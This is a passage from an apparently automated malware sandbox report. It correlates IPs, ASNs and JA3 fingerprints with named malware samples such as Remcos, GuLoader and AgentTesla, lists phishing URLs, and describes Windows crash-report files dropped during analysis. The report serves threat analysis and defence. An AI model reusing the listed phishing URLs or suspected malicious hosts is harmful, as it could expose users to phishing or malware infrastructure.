                                                    PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    GVV.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    SWISSCOMSwisscomSwitzerlandLtdCH2AAH1UYstb.elfGet hashmaliciousMiraiBrowse
                                                    • 164.207.10.72
                                                    PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 193.222.96.21
                                                    Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 193.222.96.21
                                                    cvoBQP1Lxo.elfGet hashmaliciousMiraiBrowse
                                                    • 170.17.254.60
                                                    cqf3hb5Qxg.elfGet hashmaliciousMiraiBrowse
                                                    • 146.4.138.28
                                                    957URl9ErB.exeGet hashmaliciousSocks5SystemzBrowse
                                                    • 193.222.96.219
                                                    .04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 193.222.96.21
                                                    z39103_PN-EN-1090-1_A1_2012P.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 193.222.96.21
                                                    z6FORMATOPROVEEDORESMETAX.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 193.222.96.21
                                                    z77EU17439-FT-MILKYLUXGOUDAMILD.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 193.222.96.21
                                                    CLOUDFLARENETUSx2B1c7K1L2D9M15048176901.htmlGet hashmaliciousUnknownBrowse
                                                    • 104.21.59.220
                                                    https://possible.network/?cmFuZDE9WTI1aFN6SlNOazlXT1V4WGJFZGpaVEpJYnpjPSZzdj1vMzY1XzFfbm9tJnJhbmQyPVFYRnlhR2RJU2xOeVUyb3lZMnREYmtwRVRuUT0mdWlkPVVTRVIyNTA0MjAyNFVOSVFVRTAxMzgwNDI1MzkyMDI0MjAyNDA0MjUzODAxMzkmcmFuZDM9YWtkSlYwOTFSWEYwV0hSU1NISlJVbGRIUzBFPQ==Get hashmaliciousHTMLPhisherBrowse
                                                    • 172.67.128.246
                                                    PO-240501-PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.13.205
                                                    rE56cXOc25.rtfGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.215.45
                                                    qneGb3RjUn.rtfGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.215.45
                                                    SecuriteInfo.com.Win32.PWSX-gen.2445.18181.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.13.205
                                                    https://0ia63.q39r.com/0IA63/Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.21.17.5
                                                    SecuriteInfo.com.Win32.PWSX-gen.11739.16980.exeGet hashmaliciousRisePro StealerBrowse
                                                    • 104.26.5.15
                                                    https://mandrillapp.com/track/click/31140489/aazenterprise.com?p=eyJzIjoiNUJvNUhtZmVHb2F5TEhHSWo4U3JuemNCVDJBIiwidiI6MSwicCI6IntcInVcIjozMTE0MDQ4OSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FhemVudGVycHJpc2UuY29tXFxcL2lucXVpcnkuaHRtbD93aGl0ZT1aR1YyY21sbGJtUjBMbUpsY25SQVpHVnRaUzFuY205MWNDNWpiMjA9XCIsXCJpZFwiOlwiNTQ2NzE3YTVmZjkwNDc2Zjk4NzEyMzQ3MjYwNGUyYThcIixcInVybF9pZHNcIjpbXCI1N2JjZTAyMmU5NDQ5ODNjNzcxODk1ZTUzYThjYmMzZDdhNmZhZmEyXCJdfSJ9Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.2.184
                                                    https://www.canva.com/design/DAGEBBzq9KM/jvjE01qRbaOyWhWyDOHDeg/view?utm_content=DAGEBBzq9KM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                    • 104.16.103.112
                                                    ATOM86-ASATOM86NLxi0TpAxHGMsm.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    Teklif talebi BAKVENTA-BAKUUsurpationens.cmdGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    GVV.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    Evgh. rvs Armenia. 30.04.2024.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50
                                                    202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.htaGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 178.237.33.50

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    37f463bf4616ecd445d4a1937da06e19a.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 172.67.215.46
                                                    a.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 172.67.215.46
                                                    Wb9LZ5Sn1l.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                    • 172.67.215.46
                                                    SecuriteInfo.com.Variant.Doina.72042.21290.22220.exeGet hashmaliciousUnknownBrowse
                                                    • 172.67.215.46
                                                    c4RAHq3BNl.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                    • 172.67.215.46
                                                    file.exeGet hashmaliciousVidarBrowse
                                                    • 172.67.215.46
                                                    JpFr8C6ljd.dllGet hashmaliciousUnknownBrowse
                                                    • 172.67.215.46
                                                    JpFr8C6ljd.dllGet hashmaliciousUnknownBrowse
                                                    • 172.67.215.46
                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                    • 172.67.215.46
                                                    PO-USC-22USC-KonchoCo.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 172.67.215.46

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_97e616d2-0c12-4c74-9aa1-5942bf5533cd\Report.wer

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5801888550161941
                                                    Encrypted:false
                                                    SSDEEP:96:GxFWKIAKAsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAOf/VXT5Nm:GYKIAKAk0WbkQzuiFkZ24IO8b
                                                    MD5:C4FBCF57FBB946E5EBEC5911AD3EB2A8
                                                    SHA1:833184E63204064CC55710BC0DD7386B2630A9E2
                                                    SHA-256:648584971D9FA1D527C3FFF0F6A63174F4BF2291B287D6C1C6C047FB63229419
                                                    SHA-512:3F6C68E0BF33D8A0D1FD5FAD609B259B34B34F9A024C1B571549ECF6BF2D7264A44B217A86125D2EE07F0C8E0689F9989E92F51CBD47B1806A007004B2FC4AFA
                                                    Malicious:false
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.1.9.5.8.5.7.4.3.6.3.6.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.1.9.5.8.6.3.1.2.3.8.7.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.e.6.1.6.d.2.-.0.c.1.2.-.4.c.7.4.-.9.a.a.1.-.5.9.4.2.b.f.5.5.3.3.c.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.8.c.6.8.8.f.-.a.6.8.9.-.4.1.a.6.-.9.f.5.7.-.6.9.2.3.9.c.9.e.4.5.d.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.0.0.-.0.0.0.1.-.0.0.1.4.-.9.d.1.4.-.8.6.b.3.2.d.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_a84e9785-c8fa-4ffb-97f7-c80ae546c113\Report.wer

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.580554351180953
                                                    Encrypted:false
                                                    SSDEEP:96:rGFnZUAKZsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAOf/VXT5Nm:qbUAKZk0WbkQzuiFkZ24IO8b
                                                    MD5:49353F8A9094CE02D05CA1BA898F6EBB
                                                    SHA1:6208E1549A75E22CD646CBD30C947209645EC729
                                                    SHA-256:1C5E7F30D288BE6DB99D92FD183E0F639306A8918D5A161D9A20EB0D67BCD41C
                                                    SHA-512:8E0F03781FD4626D3217F1FB1623CA6D96936BE78D3699855745B3A77ADF8E292CCBA914D84EEEE4B4815A0ACD2CFAD4C690A8E804B863288928FC147D5CDAC3
                                                    Malicious:false
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.1.9.5.8.5.7.5.4.4.4.3.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.1.9.5.8.6.3.0.7.5.6.8.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.8.4.e.9.7.8.5.-.c.8.f.a.-.4.f.f.b.-.9.7.f.7.-.c.8.0.a.e.5.4.6.c.1.1.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.d.e.0.6.7.3.3.-.5.6.d.9.-.4.4.a.7.-.a.2.f.8.-.3.6.9.9.7.5.b.a.6.3.4.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.4.c.-.0.0.0.1.-.0.0.1.4.-.1.0.7.1.-.8.b.b.3.2.d.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_c64b981f-f333-41a5-af73-c2444e46bfa6\Report.wer

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5804373497227237
                                                    Encrypted:false
                                                    SSDEEP:96:9ZFsDAK/sQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAHf/VXT5NHG:7qDAK/k0WbkQzuiF/Z24IO8b
                                                    MD5:973998ADEFAEBD296FCE6ADACC91C239
                                                    SHA1:C5CA544715243EDB062C049DF8B3DD66073AA38C
                                                    SHA-256:00AA39A401BC3DBC8E44AA78840A07F07B552B33A4EA68D95A714A252E981FF1
                                                    SHA-512:CB53DCBCB46D73FFA7C79B06B5093AAC435E494EECB58698A247FB052EC19C3CFEE502369917F25B2E3077253BA27442ADA17AA1FDFB515E62F29876B9DB75D3
                                                    Malicious:false
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.1.9.5.8.4.2.9.4.6.9.0.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.1.9.5.8.4.8.3.2.1.9.1.7.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.4.b.9.8.1.f.-.f.3.3.3.-.4.1.a.5.-.a.f.7.3.-.c.2.4.4.4.e.4.6.b.f.a.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.6.0.b.f.f.c.-.3.9.2.e.-.4.6.0.8.-.b.4.6.4.-.e.f.9.9.e.6.f.8.6.6.e.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.2.c.-.0.0.0.1.-.0.0.1.4.-.6.d.8.3.-.e.0.a.a.2.d.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_e43dba7a-2656-4838-b4e7-c6c5a8b56b61\Report.wer

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5805092768680671
                                                    Encrypted:false
                                                    SSDEEP:96:nXFUAKSsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAHf/VXT5NHBg:XeAKSk0WbkQzuiF/Z24IO8b
                                                    MD5:F3184E47524E453E44F5F66FA5FE2DB4
                                                    SHA1:98AEF61BA6C95E3A503C3A459318603CEDA5CFF2
                                                    SHA-256:A90B6318177F0E63F14584D5FE753724CE920AB1F6F48C15E777902C75D478AE
                                                    SHA-512:89480AAC2AC2D134ABA574C97E43452C0A19F0F80E233EFA6CC29C58152D9350822B003B4DBD58C30AD1BAECB5F5B1DD6AE819A70A57AC25D20278C33B22B34A
                                                    Malicious:false
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.1.9.5.8.3.7.8.0.2.4.4.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.1.9.5.8.4.2.8.6.4.9.5.9.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.3.d.b.a.7.a.-.2.6.5.6.-.4.8.3.8.-.b.4.e.7.-.c.6.c.5.a.8.b.5.6.b.6.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.f.a.f.a.3.1.-.1.f.3.2.-.4.6.9.0.-.b.9.8.0.-.7.e.8.a.6.a.3.d.c.f.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.3.0.-.0.0.0.1.-.0.0.1.4.-.b.4.4.7.-.3.f.a.6.2.d.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_ebcd1d5a-ef39-4e27-b678-5c312fcdc338\Report.wer

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5799927588934032
                                                    Encrypted:false
                                                    SSDEEP:96:FYFO6AKwsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAHf/VXT5NHG:O/AKwk0WbkQzuiF/Z24IO8b
                                                    MD5:00167BA4D42757751FF68DDF7E8752C9
                                                    SHA1:0C6C56993EDDF3C3F687E450A95B55A5F3061EB7
                                                    SHA-256:B37B0B8BCF66A7B7E66B26D6E3C9CDDBCB830FDA230BA0408AAB71A4DF9680A1
                                                    SHA-512:B466FD242E2FD84A8DBAC68862B92742D645DA237311015793A216F35C9786D40EF0C72666F397DE828B9A82FD211B9E1F5817700A0F373C619ADD9902DD6B68
                                                    Malicious:false
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.1.9.5.8.3.7.7.4.1.3.8.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.1.9.5.8.4.2.7.7.2.6.2.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.c.d.1.d.5.a.-.e.f.3.9.-.4.e.2.7.-.b.6.7.8.-.5.c.3.1.2.f.c.d.c.3.3.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.a.0.9.b.9.a.5.-.0.c.d.6.-.4.d.4.d.-.a.8.e.5.-.b.1.c.7.4.c.6.2.c.0.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.1.0.-.0.0.0.1.-.0.0.1.4.-.5.1.b.4.-.4.4.a.6.2.d.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_f94f936b-b220-4900-bcdd-21d10c4473ec\Report.wer

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5805792081838115
                                                    Encrypted:false
                                                    SSDEEP:96:yEFw6jAKyasQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAHf/VXT5c:jHjAKBk0WbkQzuiF/Z24IO8b
                                                    MD5:C9CE2F397334EF1C573C9BB4ADF609F1
                                                    SHA1:908CC39F5DBF91BA6C6D2EDB0CDA0ACCF574F7FC
                                                    SHA-256:38437752E09F736B7857ADA139319C6F7E16ECB03E15DDA4FC08E5801CBC11F2
                                                    SHA-512:F786A01F700516B6AEC856A2934800A3293CC0AE3E2F287AD0D2DADB3B4E18026B5EE00B476347BAB26B0E3050488A042F13E17E7F63D2BBD008335D210F66AE
                                                    Malicious:false
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.1.9.5.8.3.7.2.1.8.9.1.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.1.9.5.8.4.2.7.5.0.1.6.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.4.f.9.3.6.b.-.b.2.2.0.-.4.9.0.0.-.b.c.d.d.-.2.1.d.1.0.c.4.4.7.3.e.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.1.c.6.d.7.9.5.-.9.4.d.b.-.4.f.9.f.-.8.6.9.5.-.8.6.4.b.2.9.6.5.5.b.1.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.d.c.-.0.0.0.1.-.0.0.1.4.-.8.4.7.e.-.4.1.a.6.2.d.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_bad_module_info_dcd3242e9fa4189184df4216daa4e4c7cdf1959_85207d7d_f9afd325-82b1-4ddd-aab9-a0b1f6266b70\Report.wer

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.5805852011017253
                                                    Encrypted:false
                                                    SSDEEP:96:iauFCAKI7tsQhMov7JYqQXIDcQ4c6fcE+cw3tZAX/d5FMT2SlPkpXmTAOf/VXT5c:coAKI7tk0WbkQzuiFkZ24IO8b
                                                    MD5:DC9EE084BB262EE8CC9768F17762726D
                                                    SHA1:00F32D96E8737DC3BE549A96623B0BEC4CEA8B57
                                                    SHA-256:2EAD8AD20194A65E0D51F5FC3822C7D800D3206D919E0252D441D4BAED751648
                                                    SHA-512:71D2056CFE4294E583E1FFB327AA1D38EA7D5887E26F7F37320E5C486D9A08D56980367658DF9DCDF89D61EA593977092FB2E684C7BE7EA617231133C20EE455
                                                    Malicious:false
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.9.1.9.5.8.5.7.4.2.1.5.7.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.9.1.9.5.8.6.3.1.2.4.7.0.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.a.f.d.3.2.5.-.8.2.b.1.-.4.d.d.d.-.a.a.b.9.-.a.0.b.1.f.6.2.6.6.b.7.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.f.3.a.b.b.7.-.5.e.d.e.-.4.7.4.d.-.9.f.6.8.-.5.b.6.a.b.d.6.b.7.b.4.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.b.a.d._.m.o.d.u.l.e._.i.n.f.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.2.0.-.0.0.0.1.-.0.0.1.4.-.7.c.a.2.-.8.3.b.3.2.d.9.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.6.7.7.a.3.5.6.6.7.8.9.d.4.d.a.5.4.5.9.a.1.e.c.d.0.1.a.2.9.7.c.2.6.1.a.1.3.3.a.2.!.w.a.b...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER73C1.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8252
                                                    Entropy (8bit):3.6762875704759965
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJPU6v6YWo6SgmfUlpxm89bObsfR6m:R6lXJs6v6YB6SgmfUlOgfN
                                                    MD5:2A5BB587C32A74F7BDA8B4F7CAB07F9C
                                                    SHA1:A92221922D0FA0D0EB066CE73D6673B54631597E
                                                    SHA-256:BD564E700846470CFE4A104BB38D018213B11BCBC580F8BB18344B59004DE049
